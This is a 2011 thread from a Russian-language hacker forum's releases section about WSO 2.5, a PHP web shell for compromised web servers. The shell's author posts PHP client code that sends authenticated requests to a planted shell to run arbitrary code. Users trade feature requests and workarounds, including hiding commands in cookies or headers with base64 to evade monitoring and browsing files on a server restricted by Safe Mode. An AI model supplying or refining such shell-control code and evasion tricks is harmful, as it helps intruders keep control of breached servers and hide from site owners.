RDot

RDot (https://rdot.org/forum/index.php)
-   Релизы/Releases (https://rdot.org/forum/forumdisplay.php?f=11)
-   -   WSO 2.5 (web shell) (https://rdot.org/forum/showthread.php?t=1085)

oRb 18.01.2011 11:29

nemoy, в шелл встроен функционал, для более удобного взаимодействия с менеджерами шеллов. Пример использования:
PHP код:

<?php
$url 
'http://test/wso2.php';
$password 'root';
$code 'phpinfo();';

$context stream_context_create(array('http' =>
    array(
        
'method'  => 'POST',
        
'header'  => array (
            
'Content-type: application/x-www-form-urlencoded',
            
'Cookie: ' md5(parse_url($urlPHP_URL_HOST)) . '=' md5($password)
        ),
        
'content' => http_build_query(
            array(
                
'a' => 'RC',
                
'p1' => $code
            
)
        )
    )
));

echo 
file_get_contents($urlfalse$context);


euro 29.01.2011 20:22

можешь ли сделать форму для указания порта при конекте к mysql и Postgresql ?

oRb 29.01.2011 20:53

В поле host можно указывать порт.
address:port

Лаврушкин 30.01.2011 19:48

Былоб неплохо еслиб всякие исполнения команд/евал кода передавались через HTTP_*,COOKIE ну или в тот же пост добавить code/decode того же base64 например.
Хоть и не частно..но бывает что за POST'ом следят и отслеживают всякие вкусности типо ls -la,passwd и т.д

Azz100 31.01.2011 09:51

Проблема с кодировкой. После запуска на Денвере:

http://savepic.net/516395m.png

http://savepic.net/517419m.png

nomad 02.02.2011 20:41

Поменяй кодировку в шелле

Mikki 05.02.2011 13:08

Недавно столкнулся с такой неприятностью, Safe Mode = ON. На сервере были отключены некоторые PHP функции, и приходилось для просмотра списка файлов, их атрибутов и т.д. лезть во вкладку PHP и там выполнять разные скрипты.
Код:


$dir = opendir("/home/.../public_html");
while(($file = readdir($dir)))
{
  print $file;
  print "\n";
}
closedir($dir);

Код:

 
echo substr(sprintf('%o', fileperms('index.php')), -4);
echo is_writable('index.php');

и т.д. и т.п.

Было довольно гемморно, появилась мысль, что было бы неплохо прикрутить подобный функционал к WSO, на случай Safe Mode ON.

nobody 05.02.2011 14:15

orly? какие же функции были отключены, что всо не смог пролистать папку, а твой скрипт смог?

oRb 05.02.2011 20:35

Да, такая бага/фича есть. Проблема заключается в том, что wso использует функции is_file, is_link, is_dir для определения типа записи. Но поскольку включен сейфмод, и uid владельца файла не совпадает с uid текущего процесса, эти функции возвращают false. И судя по мануалу (http://ru.php.net/manual/en/features.safe-mode.functions.php), мне не понятно почему в данной ситуации могут работать функции fileperms и is_writable.

Norton710 06.02.2011 12:42

Еще одна тема - шелл совершенно не видит русские символы в названиях папок и файлов и поэтому отказывается их открывать.. Смена кодировки не помогает в данном случае.


Часовой пояс GMT +3, время: 17:57.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot